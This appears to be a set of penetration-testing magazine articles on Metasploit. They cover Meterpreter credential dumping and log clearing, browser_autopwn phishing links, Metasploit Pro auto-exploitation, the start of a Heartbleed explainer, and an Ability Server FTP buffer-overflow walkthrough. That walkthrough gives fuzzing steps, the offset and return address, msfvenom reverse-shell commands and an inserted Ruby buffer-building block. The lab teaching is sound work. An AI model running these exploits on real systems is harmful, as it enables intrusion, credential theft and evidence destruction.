payload that does too much may guarantee detection by a host-based defense; conversely, some exploits by
their nature work only once before crashing the service, so a too-conservative payload may cost the tester the
access. Metasploit has a custom shell environment called Meterpreter that can be packaged as a payload; many
testers choose it because it has a small footprint, runs inside the memory of the exploited process, is versatile
and comes loaded with post-exploitation functionality. [7]
Maintaining Access
Once the tester has an initial foothold in the target network, the maintaining access phase begins, in which
the tester tries to solidify their grip on the target. Here the Meterpreter shell environment becomes much more
important. Meterpreter's options and settings can be manipulated directly from the Armitage GUI, and
Armitage can use Meterpreter to upload additional tools to the victim and set up backdoors.
Netcat is a general-purpose networking utility that is commonly used as a simple backdoor and can easily be
uploaded and set up through Meterpreter; many other utilities can serve the same purpose. [4] Rather than
installing an obviously malicious backdoor service, experienced penetration testers often try to blend in with
legitimate traffic, and one of the most effective ways to masquerade as an authorized user is to obtain valid
credentials. Valid credentials are arguably some of the most valuable information a penetration tester or
attacker can uncover, and Meterpreter and Armitage offer several ways of obtaining them.
Meterpreter is best suited to Windows targets; it also runs on Linux and UNIX hosts, but with fewer features
there. [7] Meterpreter can dump Windows LM and NTLM password hashes directly into password-cracking
utilities (NTLM hashes can also be replayed directly in pass-the-hash attacks without cracking them), and it
can export Linux shadow files, although that may require more interaction from the tester. For Windows
targets Armitage can take the hashes from Meterpreter and crack them directly in John the Ripper, a popular
password-cracking utility. Figure 4 shows Armitage cracking passwords obtained from Meterpreter using John
the Ripper. The unified interface helps organize important information and optimize the test. A penetration
tester must consider that the specific vulnerability used to compromise the target may eventually be patched;
the objective of the maintaining access phase is to have other options for access.
Figure 4. Armitage Password Cracking
Covering Tracks
In the final phase of the penetration test, the tester attempts to cover up the evidence that the compromise
ever occurred. A penetration tester must take extra care here, because they do not want to remove information
that will be valuable when explaining and reporting the test to the client. A real attacker would not be so kind
as to leave their tracks, but the penetration tester may need that information as a teaching tool. One useful
approach is to back up logs and other information before deleting them; the client's IT staff can then be
evaluated on their forensic abilities while the log data remains available to show the test results.
Meterpreter includes a particularly useful script for clearing Windows logs, log.clear, which is run from the
Meterpreter shell. [7] By default the script clears only the System event log, but it can be configured to clear
all logs. Covering tracks may seem straightforward, but it can be deceptively difficult to do thoroughly: logs
may already have been forwarded to a central syslog or SIEM server, which clearing the local event logs does
not touch, and the act of clearing is itself often logged. One way to make this phase easier is to keep all of
the phases in mind as new assets become available.
Working the Phases Holistically
The phases are designed in chronological order, but they do not always have to be carried out strictly in that
order. Considering the phases as a whole often pays off: an experienced penetration tester can make decisions
during the test that improve later actions. [5] The covering tracks phase, for example, is far easier if logging
never occurs; in the gaining access phase the tester can use scripts built into Metasploit to disable anti-virus
and firewalls on compromised hosts.
Some of this comes with experience, but any skillful penetration tester can take steps toward a better test. At
the beginning and end of each phase the tester should consider what new options are now available and
whether they open new opportunities, evaluating the phases before and after the current one; any new option
that could improve another phase should be evaluated and pursued.
A penetration tester is well served by putting a methodology behind their testing strategy. Much as networking
professionals use the OSI model to organize and troubleshoot networking issues, the penetration tester can
use the EC-Council five-phase attack plan to organize a test. [1,8] The five phases are considered
chronologically, as designed, but they are best used when also evaluated holistically. Working through each
phase carefully while continually looking at the testing plan as a whole is the most effective way to leverage
the five-phase model.
A penetration tester's tool kit should be an extension of the tester themselves. Knowing which utilities are
available and using them to their full potential is essential. BackTrack Linux is a distribution designed
specifically for penetration testers, and its tools can carry out a full multiphase penetration test. [5]
Metasploit and the accompanying Armitage GUI are two key tools in a skilled tester's kit. [3,9] The
robustness of Metasploit and the organizing capabilities of Armitage make them stand out among the
alternatives.
Tools will change, but a strong methodology stays current through changes in technology. A good penetration
tester works to understand the resources available to them and how to apply each one effectively in each
phase. Much of the planning can happen before a job is ever received: although the target dictates which
tools apply, a good tester can prepare for many different scenarios. Practicing in lab environments and with
virtualization helps a tester assemble a strong tool kit. The best penetration testers prepare, and continually
improve their craft through practice.
About the Author
Lance Cleghorn, a North Carolina native, received a Bachelor of Science degree in Information Technology
from East Carolina University, graduating Summa Cum Laude in 2012. As an undergraduate he concentrated
in Cisco networking technology. He is currently pursuing a Master of Science in Information Security at East
Carolina University and holds several major industry certifications, including Associate of (ISC)2 towards
the CISSP, CCNP, CompTIA Security+, EMCISA and MCP.
Pentesting Windows using Metasploit
by Omkar Prakash Joshi
The Metasploit Project is a computer security project that provides information about security vulnerabilities
and resources for penetration testing and IDS signature development. Its best-known sub-project is the open
source Metasploit Framework (MSF), a tool for developing and executing exploit code against a remote
(target) machine. Other important sub-projects include the Opcode Database and the shellcode archive.
The Metasploit Project is also well known for its anti-forensic and evasion tools, some of which are built
into the Metasploit Framework.
The Metasploit Framework is both a penetration testing system and a development platform for creating
security tools and exploits. The framework is used by network security professionals to perform penetration
tests, system administrators to verify patch installations, product vendors to perform regression testing, and
security researchers world-wide. The framework is written in the Ruby programming language and includes
components written in C and assembler.
Lab Setup
In this article I demonstrate all attacks in a virtual environment built with VMware Workstation 10. In that
workstation I have created two virtual machines:
Attacker machine (Kali Linux)
Client or victim machine (Windows XP Professional)
Metasploit was created by HD Moore in 2003 as a portable network tool using Perl. By 2007, the
Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit
Project announced that it had been acquired by Rapid7, a security company that provides unified
vulnerability management solutions.
Like comparable commercial products such as Immunity's CANVAS or Core Security Technologies' Core
Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems.
Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities.
Metasploit Framework (MSF)
The MSF is one of the most useful auditing tools freely available to security professionals today. It ranges
from a wide array of commercial-grade exploits and an extensive exploit development environment all the
way to network information gathering tools and web vulnerability plugins. The MSF is far more than a
collection of exploits; it is an infrastructure that you can build on and adapt to your own needs.
Metasploit Terms
Exploit: code that takes advantage of a security flaw within a system, network, or application.
Payload: the code that the exploit makes the victim computer execute on behalf of the Metasploit Framework,
for example a command shell or Meterpreter.
Module: a self-contained piece of code that plugs into the Metasploit Framework to perform a task, such as an
exploit, an auxiliary scan or a post-exploitation action.
Shellcode: a small piece of machine code used as a payload, so called because it traditionally spawns a shell.
Msfconsole is an all-in-one interface to most of the features in Metasploit. It can be used to launch attacks,
create listeners and much, much more, and I use it for the attacks below. To launch the console, run the
command msfconsole.
Figure 1. Running msfconsole command
Msfcli is another way to access the Metasploit Framework; it focuses on scripting and interoperability with
other console-based tools. To view the msfcli help, run msfcli -h.
Figure 2. Listing help for msfcli
Now a little practice with msfcli. When learning Metasploit, if you get stuck you can see the options of a
module by adding the letter O to the end of the command line. For example, I use the windows/smb/
ms08_067_netapi exploit to attack Windows-based machines:
Figure 3. Listing options of exploit
This module requires three options: RHOST, RPORT and SMBPIPE. Adding P to the end lists the payloads
that are compatible with this exploit. Keep your framework updated so that you can use and practice with the
latest exploits and payloads when performing a penetration test or security assessment.
Figure 4. Setting up RHOST
We run the exploit by selecting a payload, filling in the options and appending the letter E to the end of the
msfcli argument string. Here I select the windows/shell/bind_tcp payload:
Figure 5. Setting up the payload
Once all the steps have completed, the exploit runs against the Windows XP target and, because the chosen
payload is windows/shell/bind_tcp, returns a command shell session bound on the target (choose a
windows/meterpreter payload instead if you want a Meterpreter session). You can now access the target
machine without its user being aware.
The msfpayload component of Metasploit generates shellcode and executables. Shellcode can be generated in
many formats including C, Ruby, JavaScript and even Visual Basic; each output format is useful in different
situations.
Just as with msfcli, if you need to find out the required options, append the letter O on the command line.
Figure 6. Listing out options for payload
Exploiting with browser_autopwn
Nowadays firewall restrictions and patch management policies have made the exploitation of exposed systems
much more difficult, and client-side attacks are among the most efficient alternatives. Client-side attacks
require user interaction and in most cases are delivered through social engineering: an employee who does not
have the knowledge to understand the risk of opening untrusted links can give an attacker a way to exploit
internal systems. The fact that browsers and their plugins are often not patched as promptly as operating
systems makes the problem worse.
The basic idea behind the browser_autopwn module is that it starts a web server on our machine that hosts a
range of browser exploits. When the user opens the malicious link, the exploits are launched against the user's
browser, and if one of them succeeds a Meterpreter session opens.
To use this attack we open the Metasploit Framework and select the browser_autopwn module. I select the
auxiliary module (auxiliary/server/browser_autopwn) in msfconsole:
Figure 7. Selecting auxiliary browser_autopwn
Now I set LHOST to our IP address (the host IP), SRVPORT to 80 (otherwise the link we send to the user
must be in the form IP:8080) and URIPATH to / so that Metasploit does not generate a random URL. Binding
port 80 requires running msfconsole as root.
Figure 8. Listing out & setting options
After the module starts we will see a variety of exploits for different browsers being loaded onto our web
server.
Figure 9. Running auxiliary
Now we can send the link by email to the client's employees. If any user opens the malicious link, the
autopwn module tries all of its exploits in turn to see whether it can break into the client. If the browser is
vulnerable to any of them, a Meterpreter session opens.
Inside a network this can be made even easier: if we can redirect a legitimate website to our malicious IP
address using DNS poisoning or a similar technique, the user does not even have to click a link we sent.
Figure 10. Listing out & selecting session ID
Figure 11. Meterpreter session of windows
In this way we can perform penetration testing or exploitation of Windows hosts using the Metasploit
Framework. Most organizations sit behind proxy firewalls that allow only outbound web ports such as 80,
which is why serving the exploits on port 80 matters. At the same time many employees use social networks
for various reasons, and an attacker can abuse that by sending malicious links through them. This attack can
therefore be very effective against companies: the module carries exploits for most popular browsers and
needs only one person's mistake to succeed. The Metasploit Browser Autopwn module is proof of how
dangerous it is to open links that come from untrusted sources.
About the Author
CEH, CHFI, ECSA/LPT, ISO 27001 LA, Cyber Forensic Investigator, Digital
Evidence Analyst, Information Security Consultant & Researcher
I have been working in the IT field for the last year. I am an independent security researcher. I have
acquired knowledge and experience in computer and mobile forensics as well as information security and
ethical hacking training. I hold several certifications, including CEH, CHFI, ECSA/LPT, ISO 27001 Lead
Auditor and Cyber Crime Investigator. I give training to corporates as well as students in mobile and
computer forensics. I am currently working at Fluxonix Corporation, Pune, as Knowledge Engineer Manager,
Computer Forensics.
I have published three articles related to Android and iOS hacking and forensics in International
Metasploit for Exploits Development: the
Tools Inside the Framework
by Guglielmo Scaiola
A lot of people use Metasploit to gain access to hosts and networks, ethically or not. In some cases the
operation is very simple: with the GUI versions, Rapid7's professional edition or Armitage for example, the
attack becomes a point-and-exploit activity, and the post-exploitation tasks and pivoting are also very simple.
Not everyone knows, however, that the framework was born to cover the whole exploit lifecycle, starting with
fuzzing tools and ending with usable, integrated modules. Today I want to focus on this second aspect of the
framework. I do not want to teach you how to write an exploit, but how to use the framework to do so. For
this reason I start with a well-known exploit, the Ability Server 2.34 STOR buffer overflow, which anyone who
has done the OSCP certification knows very well, and for which many PoCs exist on the Internet
(Buffer_Overflow, ). Today's task is fuzzing and exploiting using only the Metasploit tools. If you need
more information on the exploit you can read these two websites:
If you look in the metasploit and metasploit/tools directories you will find a lot of interesting pieces of Ruby.
OK, let's start by looking at the directories:
Figure 1. Metasploit framework directory
Figure 2. The tools directory
Today for my lab I use my favorite BackTrack 5 R3 machine and an old virtual machine with Windows XP SP3
installed in Italian. This is interesting because, as you can see, the targets of the existing module are only:
Exploit Targets
0 Windows XP SP2 ENG
1 Windows XP SP3 ENG
In the real world, if you need to exploit this machine, you cannot simply use the pre-existing module: the
return address depends on the exact DLL build, which differs between language versions of Windows.
The backtrack machine has IP and the target has
Figure 3. My windows machine
On this machine I have installed (copied) the CodeCrafters Ability Server 2.34; if you do not have it you can
find the file on eMule. When you start the server you need to dismiss the freeware banner.
Figure 4. Ability Server: the freeware banner
Then you are in the main menu.
Figure 5. Ability Server: home
Now I set up the username and the password (it is also useful to tick Auto Activate).
Figure 6. Ability Server: configuration
Before starting to fuzz, it is a good idea to test the connection between the two virtual machines. For this
you can use the ftp command:
root@yamabushi:/CEH/sample scripts/D4# ftp
ftp> open
Connected to
220 Welcome to Code-Crafters Ability Server 2.34. (Ability Server 2.34 by Code-Crafters).
Name ( ftp
331 Please send PASS now.
230- Welcome to Code-Crafters Ability Server 2.34.
230 User ftp logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
If you need to write your own fuzzer you need to know the commands this FTP server supports; you can use
the ftp command help:
Figure 7. Connection with ftp server
OK, the FTP server works fine. Now I want to start fuzzing: I start msfconsole and test whether the
application is vulnerable. In msfconsole we have different fuzzers for different services.
Because I want to find a vulnerability in an FTP server, I will use auxiliary/fuzzers/ftp/ftp_pre_post. This
module can fuzz the pre-authentication phase and is also able to fuzz post-authentication commands (http://www.
Figure 8. Fuzzers
Figure 9. ftp_pre_post
Now I load the module and set the target data: the target IP, the username and the password.
use auxiliary/fuzzers/ftp/ftp_pre_post
set USER ftp
set PASS ftp
Figure 10. Setting ftp_pre_post
If you show the options you will find many others. The most important in this case, for time optimization,
is STARTATSTAGE, which selects the stage of the FTP session I want to fuzz:
1 Issue no command, only send evil data
2 Fuzz the USER command
3 Fuzz the PASS command (after a valid USER command/login was executed)
4 Fuzz all FTP commands (after a valid login was performed), one command, one fuzz string per session
5 Fuzz all FTP commands (after a valid login was performed), one command with all fuzz combinations for
that command per session
Today I do not want to try the pre-auth phase, so I will choose stage 4. To see the commands fuzzed in this
stage, type show advanced; by default the tool tries all FTP commands, and for this demo I will remove some
commands to save time with:
set FtpCommands CWD STAT STOR
so that I try only CWD, STAT and STOR. If you need more information on the stages you can look at the site:
https://www., In this article I also want to shorten the test by setting ENDSIZE to 2000 (the default value
is 20000) and the STARTSIZE and the
Now you can start fuzzing with the command run; on the screen you can see the command and the number of
characters sent to the target.
Figure 11. Starting ftp_pre_post
If the application is vulnerable, once the payload grows past the size of the stack buffer the server crashes
with an exception.
Figure 12. The crash windows
At this point the fuzzer stops, and you can see approximately the size required to smash the stack.
Figure 13. The crash fuzzer
If you go to the target, in the installation directory you will find a log directory; open the last log file and
you can see the payload sent by the fuzzer, a non-repetitive pattern of characters.
Figure 14. The crash log
Now you are sure the application is vulnerable. Let's find the offset and the return address. For this I start
Ability Server under my favorite debugger, Immunity Debugger; if you prefer OllyDbg or another debugger, no
problem, the result will be the same (I hope).
Figure 15. Immunity Debugger
After the crash you can copy the value of EIP, in our example 42326742.
Figure 16. EIP
and we can use the pattern_offset script to find the real offset. The syntax is pretty simple: ./pattern_offset
42326742. The response is the offset to EIP, in our case 966. OK, now I have the offset.
Figure 17. Pattern_offset
If you do not use the fuzzer in the framework but a script in Python or another scripting language, you can
generate a pattern with the pattern_create script and paste the string into your script; when the application
crashes you read the value in EIP from the debugger and then use pattern_offset. The syntax is
./pattern_create number_of_chars; in my example:
./pattern_create 2000
Figure 18. Pattern_create
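As an added example (illustrative code, not from the article and not Metasploit's own tools), the Ruby below re-implements the cyclic pattern behind pattern_create and pattern_offset, plus a stage-4 style fuzz case generator for the CWD, STAT and STOR commands, so you can check that the EIP value 42326742 really maps back to offset 966. The size parameters and the use of the pattern as the fuzz string are assumptions; the internals of the real ftp_pre_post module are not reproduced here.

```ruby
# Added example: minimal re-implementation of the cyclic pattern used by
# pattern_create / pattern_offset, plus a stage-4 style fuzz case generator.
# Illustrative code, not Metasploit's.

UPPER = ('A'..'Z').to_a
LOWER = ('a'..'z').to_a
DIGIT = ('0'..'9').to_a

# Aa0Aa1...Aa9Ab0...Zz9: every (upper, lower, digit) triple occurs once, so any
# 4-byte window is unique within one period of 26*26*10*3 = 20280 bytes.
# Requests longer than one period are capped here (assumption for brevity).
def pattern_create(length)
  buf = String.new
  UPPER.each do |u|
    LOWER.each do |l|
      DIGIT.each do |d|
        buf << u << l << d
        return buf[0, length] if buf.length >= length
      end
    end
  end
  buf[0, length]
end

# Accepts either the EIP value as read in the debugger (8 hex digits, with or
# without 0x) or the 4 ASCII characters themselves. x86 is little-endian, so
# EIP = 0x42326742 means the bytes 42 67 32 42 = "Bg2B" sat in memory.
def pattern_offset(value, length = 20280)
  needle =
    if value =~ /\A(0x)?\h{8}\z/i
      [value.sub(/\A0x/i, '').to_i(16)].pack('V')
    else
      value
    end
  pattern_create(length).index(needle)   # nil when not found
end

# Stage-4 style fuzz cases: one command, one fuzz string per FTP session, with
# the string growing from start_size to end_size in steps (the article sets
# ENDSIZE to 2000). Each element is the full command line to send after login.
def fuzz_cases(commands, start_size:, end_size:, step:)
  cases = []
  commands.each do |cmd|
    (start_size..end_size).step(step) do |size|
      cases << "#{cmd} #{pattern_create(size)}\r\n"
    end
  end
  cases
end

if $PROGRAM_NAME == __FILE__
  puts pattern_offset('42326742')    # 966
  puts fuzz_cases(%w[CWD STAT STOR], start_size: 1000, end_size: 2000, step: 500).size  # 9
end
```

In a custom Python or Ruby fuzzer you would open a fresh FTP session, send USER and PASS, send one element of fuzz_cases, and record whether the server answered; when the debugger shows the crash, feed the EIP value to pattern_offset to get the distance to the saved return address.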
Now I need the return address to finish my exploit. I want to use only the framework today, so I will use
msfpescan (you can find this value in other ways: the E button in your debugger lists the loaded DLLs to
search, or you can use findjmp2 on a Windows machine). msfpescan can find a lot of interesting information;
today I search only for a jmp esp, but if needed it can find other jumps or pop pop ret sequences, and it can
also try to identify packers. Before starting the tool I need to put my DLL somewhere: I put it in the /tmp
directory and, like the Offensive Security PWB course, I use USER32.DLL. The DLL must be the one copied
from the target machine (the Italian XP SP3), since the address is specific to that build. The syntax is:
./msfpescan -j esp /tmp/user32.dll
The first address returned by the tool is 0x7e3a9353. It contains no null bytes and looks good.
Now I am ready to make my exploit work: I have the offset and the return address, I need only the payload.
For a stand-alone exploit I can use msfvenom or, if I like the legacy world, msfpayload piped into msfencode.
I prefer msfvenom for its better performance, but for educational purposes I also show the msfpayload syntax.
In the example I want a reverse shell with netcat as the listener, so the correct payload is
windows/shell_reverse_tcp:
./msfvenom -p windows/shell_reverse_tcp LHOST= -e x86/shikata_ga_nai -b '\x00' -i 5 -f c
-p is the chosen payload, LHOST is the listener host (the listener port defaults to TCP 4444), -e is the encoder
(here shikata_ga_nai), -b lists the bad characters to avoid (here the null byte, which would terminate the
string in the target), -i is the number of encoding iterations (5) and -f is the output format, C in the
example; the C format is fine for a Python script too.
Figure 19. msfvenom
If you want to do the same with the old commands the syntax is:
./msfpayload windows/shell_reverse_tcp LHOST= R | ./msfencode -t c -e x86/shikata_ga_nai -c 5
It is really similar to msfvenom: R in msfpayload produces a raw payload, and -c in msfencode is the
equivalent of -i in msfvenom.
Figure 20. msfpayload and msfencode
Now you can paste the shellcode into your script and start the listener.
But today I do not want any script; I prefer to modify the Metasploit module for Ability Server. In real life
it is better to copy the exploit before editing, but for educational purposes I will edit the original. The
module is exploit/windows/ftp/ability_server_stor and the Ruby code is located in /opt/metasploit/msf3/
modules/exploits/windows/ftp. With my preferred editor I edit the module, adding Windows XP SP3 ITA:
kate ability_server_stor.rb
Figure 21. Targets in metasploit modules
I look for the targets in the module; as you can see, there are only two. I add a third by copying the section
between the brackets and substituting my discovered values: I put 0x7e3a9353 as the return address (RET),
leave the offset unchanged and edit the name of the target.
Figure 22. New targets
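To make the edit concrete, here is an added Ruby example (illustrative code, not the ability_server_stor module itself) that holds the new target's data and shows how the offset and return address become the STOR argument: junk up to the saved return address, the jmp esp address packed little-endian, a NOP sled, and then the shellcode. The placeholder shellcode and the sled length are assumptions, and the bad-character check mirrors the -b '\x00' passed to msfvenom above.

```ruby
# Added example, not the ability_server_stor module's code: the per-target data
# the edit adds, and the classic stack overflow buffer built from it.
# NOP sled length and placeholder shellcode are assumptions; real shellcode
# comes from msfvenom (for example with -f raw).

TARGETS = {
  # 0 and 1 (Windows XP SP2/SP3 ENG) keep the module's original values, not reproduced here.
  2 => { name: 'Windows XP SP3 ITA', ret: 0x7e3a9353, offset: 966 },
}

BADCHARS  = "\x00".b          # the -b '\x00' given to msfvenom
SHELLCODE = "\xcc".b * 16     # constructed stand-in (16 x INT3), not a real payload

# First byte of data that is also a bad char, or nil if the data is clean.
def bad_char(data, badchars = BADCHARS)
  data.each_byte.find { |b| badchars.bytes.include?(b) }
end

# Layout: junk up to the saved return address, the jmp esp address packed
# little-endian (the same byte order pattern_offset assumed when reading EIP),
# a NOP sled, then the shellcode. After RET executes, ESP points just past the
# overwritten address, so jmp esp lands in the sled and slides into the payload.
def build_buffer(target, shellcode, nops: 16)
  ret = [target[:ret]].pack('V')
  raise 'null byte in return address' if bad_char(ret)
  raise 'bad char in shellcode' if bad_char(shellcode)
  ('A'.b * target[:offset]) + ret + ("\x90".b * nops) + shellcode
end

# The overflow is in the STOR argument, so the buffer is sent as that command.
def stor_command(buffer)
  'STOR '.b + buffer + "\r\n".b
end

if $PROGRAM_NAME == __FILE__
  buf = build_buffer(TARGETS[2], SHELLCODE)
  puts buf[966, 4].unpack1('H*')   # 53933a7e
end
```

The two raise calls are the check msfvenom's -b performs on your behalf for the shellcode; the return address has to pass the same test by hand, which is why an address without 0x00 bytes was picked from msfpescan's output.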
Now I start msfconsole and try to exploit my Windows machine:
use exploit/windows/ftp/ability_server_stor
set TARGET 2
set PAYLOAD windows/shell_reverse_tcp
Figure 23. Settings the modified exploit
Like in msfvenom my payload is a netcat-like reverse shell, lets go try to p0wn the windows machine
Figure 24. gotcha
Well, everything works.
Porting a new exploit into Metasploit is beyond the scope of my article, so I stop here, but this is only
the beginning: you can improve your skills with some interesting articles on creating your own Metasploit
modules. My favorite one is on the Corelan website, by Peter Van Eeckhoutte:
php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/, but you can also find
excellent pages on the Metasploit Unleashed site from Offensive Security: http://www.offensive-,
About the Author
I have worked as an I.T. Pro since 1987; I am a freelance consultant, pentester and trainer, and I
work especially in banking environments. Over the years I have achieved several
certifications, including: MCT, MCSA, MCSE, Security +, Lead Auditor ISO 27001,
In 2011 I was awarded the Ec-Council Instructor Circle of Excellence.
I can be contacted at
Pentesting with Metasploit Pro
by Cristian Stoica
In this article we'll have a look at Metasploit Pro. The starting point will be the installation
and we'll finish with the preparation of a report.
What you will learn...
Setting up Metasploit Pro
Defining a project
Running a check on a specific target
Validating the results
Document findings
Prepare a report
What you should know...
Operating system skills
Mail servers, web servers and other services
Let's start by understanding what a penetration test, or pentest, actually means.
According to Wikipedia, a pentest is "an attack on a computer system with the intention of finding security
weaknesses, potentially gaining access to it, its functionality and data".
If we look at NIST SP 800-53 Revision 4 they define penetration testing as a test methodology in which
assessors, typically working under specific constraints, attempt to circumvent or defeat the security features
of an information system.
Penetration testing will help us identify threats, provide assurance to the organization, adopt and comply
with legal requirements and best practice and, last but not least, help an organization determine what must
be done to prevent exploitation. There are two scopes of penetration testing: non-destructive and destructive
tests. Do not engage in such activities without proper authorization and planning. Imagine the
result if you try this and end up running a one-shot exploit which might render a business critical process
The first step will be to perform the installation process, which is simple. Once the setup is completed we'll
need to access the platform via the web interface in order to set the username, password and other optional info.
Figure 1. New User Setup
The following step will be activating the product.
Figure 2. Product Activation
Once we've activated the product this will be confirmed in the next screen.
Let's make sure we have the latest version. For this we need to click on the Administration menu in the
upper right corner and select Software Updates. In this case a new version was available.
Figure 3. Software update
Since this is a new project, we'll have to define it.
Figure 4. Adding a new project
For testing purposes Rapid7 is offering a virtual machine which can be downloaded to validate the features
of Metasploit.
Make sure your test lab is properly configured and it prevents unauthorized access. If you can hack it,
somebody else can also and the last thing you need is to introduce a backdoor in your infrastructure.
I shall skip the part where we configure the test lab so that we can focus on the functionalities of the
Now that we also have a target, it's time to start defining the targets. The platform allows us to fine tune the
process according to our needs.
Figure 5. Discovery
We can even define if we need to scan for devices with SNMP management using a variety of community
strings. There are other options available such as: scan hosts individually (this will result in a slower
scanning process, however it will speed up the population of the database process), dry run. The discovery
process can be customized to include credentials. Fine tuning of the web scanning settings can be performed
also (maximum requests, time limit, concurrent requests).
Figure 6. Fine tuning the discovery process
Last but not least we can configure also the web crawler for basic authentication, seed the initial cookie
request and change the HTTP user agent.
After we've finished setting the discovery parameters it's time to hit the Launch Scan button in the bottom
right corner to start the task.
Figure 7. Discovery task running
Once the process is completed we're presented with a summary: number of hosts, services.
Figure 8. Discovery task completed
Now it's time to check if we can exploit some of the services discovered. In order to perform this task we
simply have to click on the Exploit button shown in Figure 8. Discovery task completed.
The automated exploitation attempt configuration will be presented in the next screen. If we decide to target
only one of the hosts discovered we can do that by leaving only that equipment in the target address. By
default the reliability of the exploitation is set to great. Once more please note that this can render a service
unavailable. There are several options in terms of reliability: excellent, great, good, normal, average, low.
Figure 9. Defining the automated exploitation settings
Of course there are several options available for fine tuning such as:
excluding target addresses,
payload settings
payload type: Meterpreter or command shell
connection type: automatic, bind (which is good for cases where NAT is available and all ports on the
target system are not blocked) and reverse.
listener ports
listener host
auto launch macro
enable stage encoding for IPS evasion
exploit selection
included ports
excluded ports
skip exploits that do not match the host OS (we need to be careful since the OS fingerprinting might
fail due to devices that are masking it)
advanced settings
concurrent exploits
transport evasion (each level applies different techniques: low is using delays in TCP packets, medium
is sending small packets and high combines both)
application evasion
web application identification settings (HTTP basic authentication, initial cookie, user agent)
After we have defined the required settings all we need to do is click on Exploit and let Metasploit work its magic.
A review of the settings that were chosen will be presented at the beginning of the exploitation task that is running.
Figure 10. Attempting to exploit the hosts
During this process, if an exploit is successful a new session is created and we'll be able to see it in the
Sessions menu.
When the task is completed we can review the results.
Figure 11. Automated exploit task finished
Since we have a session opened it's time to collect some info, and all we have to do is click on the Collect button
from Figure 10. Automated exploit task finished.
Evidence we can collect:
System information
System passwords
*Nix Shell
SSH keys
Installed Applications
Logged on Users
Primary Domain
Collect other files (we need to define a filename pattern, maximum file count and maximum file size)
After we have selected the information we require we need to click on the Collect System Data button.
A new task is created in which we can see the progress and information about the data collected.
Figure 12. Data collection task started
Once the task is completed we can have a look at the host in order to see an overview of where we stand.
Figure 13. Overview host
The information is grouped into several tabs: services, sessions, vulnerabilities, credentials, captured data, notes,
file shares, attempts and modules.
The collected credentials will be added to a repository so that we can use them to try to gain access.

Figure 14. Host collected credentials
Since we still have an active session we can even open and have shell access on that specific server.
Having direct shell access basically gives us full, unlimited control in terms of what we want to do with
that system.
Figure 15. Shell access
Metasploit also provides the option to start a web application scan, perform a web application audit and
exploit the web application.
There are a number of predefined reports available, including ones for PCI-DSS and FISMA compliance. Reports
can be customized, and new reports can be created.
Figure 16. Audit report
Metasploit has many features including Phishing Campaigns, Quick PenTest, Vulnerability Validation, Web
App Testing all delivered in a very clean and simple format with just a few clicks.
With the Pro version you also get Team Collaboration, VPN pivoting, Automation through Wizards, Social
Engineering, Metasploit Pro API, Vulnerability Validation and many other interesting and useful features.
You can use it as a standalone tool or start integrating it with different platforms from different vendors.
It's scalable, reliable and it comes in many versions which should cover existing needs.
About the Author
Cristian has vast expertise in IT, Cyber Security, Risk Management and Governance.
Currently he is the IT & Cyber Security Director for UTI Grup. He is actively involved in multinational
security initiatives and alliances, acts as a certified trainer for IT & Security and is a speaker at various
summits and events. Previously he has covered several senior management roles in the financial industry,
telecommunication, security. His professional services were endorsed by governmental and private
He's involved in managing the development and implementation of the security strategy and global
security policy, standards, guidelines and procedures to ensure ongoing maintenance of security and
works with other executives to prioritize security initiatives and spending based on appropriate risk
management and/or financial methodology, maintains relationships with law enforcement and other
related government agencies.
He currently holds certifications from: EC-Council: Certified EC-Council Instructor, C|CISO (Certified
Chief Information Security Officer), Certified Ethical Hacker (CEH), Computer Hacking Forensic
Investigator (CHFI)
ISACA: CISA (Certified Information Systems Auditor), CISM (Certified Information Security Manager),
CRISC (Certified in Risk and Information Systems Control), Mandiant: Advanced Malware Analysis,
ISC2: SSCP, ISO 27001 Lead Auditor, IAEA & CNCAN: Information and Computer Security for
Strategic and Critical Infrastructure, CISCO: CCAI, SonicWALL: CSSA, Symantec, IBM, McAfee,
Veeam and other institutions and is certified in Security, Risk, Weapons and Ammunition, Strategic
Management, Leadership and Managerial Communication.
You can reach him at:
HeartBleed Bug Exploiting with
by Alessandro Parisi
We'll introduce the HeartBleed Bug (CVE-2014-0160), analyzing the impact on
vulnerable servers and the inherent attack surface; then we'll show how the Metasploit
OpenSSL Heartbeat (Heartbleed) Information Leak module works and its use in
penetration test scenarios.
The bug is an implementation problem in the OpenSSL library, which provides cryptographic services
such as SSL/TLS to applications and services; it is not a design flaw in the SSL/TLS protocol specification.
OpenSSL versions affected by the bug are as follows:
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
OpenSSL 1.0.1g is NOT vulnerable
OpenSSL 1.0.0 branch is NOT vulnerable
OpenSSL 0.9.8 branch is NOT vulnerable
The bug was introduced into OpenSSL in December 2011 and has been out in the wild since OpenSSL release
1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.
The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory
data in the response allowing remote attackers to obtain sensitive information from process memory via
crafted packets that trigger a buffer over-read.
A buffer over-read happens when a program, while reading data from a buffer, overruns the buffer's
boundary and reads adjacent memory.
Buffer over-reads can be triggered, as in the Heartbleed bug, by inputs that are designed to exploit a lack of
bounds checking to read parts of memory not intended to be accessible.
The Heartbeat Extension and OpenSSL-Heartbleed
The Heartbeat Extension provides a new protocol for TLS allowing the usage of keep-alive functionality
without performing a renegotiation.
The Heartbeat Extension applies to the Transport Layer Security (TLS) protocol [RFC5246] and Datagram TLS [RFC6347]; the
adaptations to specific transport protocols are described in [RFC3436], [RFC5238], and [RFC6083].
To set up a TLS connection, a negotiation is needed, and that's relatively expensive in terms of time, due to
the fact that several messages have to be exchanged between the client and server before they can establish a
trusted connection.
The Heartbeat extension overcomes this limitation by sending keep-alive messages between client and
server, so reducing the number of negotiations.
The client sends a Heartbeat message consisting of a payload and a header containing the size of the
payload: for example, a Heartbeat request with size 5 and a text payload containing the string "Hello".
When the webserver gets that request, it saves the content of the payload in memory, as well as the size of
the payload (5 bytes, in our example).
Then, when the server sends a keep-alive response back to the client, the OpenSSL library reads the next
5 characters of memory starting from where it stored the payload and sends it back to the client (who checks
that they received the right data back, the string Hello in our example) so keeping the connection alive.
The Heartbeat implementation in the vulnerable OpenSSL library never checks that the payload size
corresponds with the actual length of the payload sent by the client.
